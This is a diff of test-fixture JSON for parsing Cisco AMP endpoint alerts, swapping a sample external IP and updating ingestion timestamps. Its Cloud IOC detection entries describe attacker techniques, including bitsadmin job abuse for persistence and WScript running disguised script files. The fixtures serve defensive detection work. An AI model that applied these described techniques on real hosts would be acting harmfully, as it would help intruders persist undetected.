Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", + "ingested": "2021-12-09T13:35:29.222420600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -292,7 +292,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -333,7 +333,7 @@ "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -343,8 +343,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322423196Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", + "ingested": "2021-12-09T13:35:29.222426300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -364,7 +364,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -427,7 +427,7 @@ "cf162622e29bca072d01b274fbbc3ceaacdd13c7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -444,8 +444,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322425452Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", + "ingested": "2021-12-09T13:35:29.222431900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -467,7 +467,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -526,7 +526,7 @@ "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -543,8 +543,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322427749Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", + "ingested": "2021-12-09T13:35:29.222437500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -566,7 +566,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -611,7 +611,7 @@ "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -621,8 +621,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322430017Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", + "ingested": "2021-12-09T13:35:29.222443100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -642,7 +642,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -690,7 +690,7 @@ "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -700,8 +700,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322432281Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", + "ingested": "2021-12-09T13:35:29.222448800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:05:50.000Z", @@ -722,7 +722,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -777,7 +777,7 @@ "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -787,8 +787,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322434612Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}", + "ingested": "2021-12-09T13:35:29.222454500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:05:50.000Z", @@ -809,7 +809,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -864,7 +864,7 @@ "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -874,8 +874,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322436881Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed 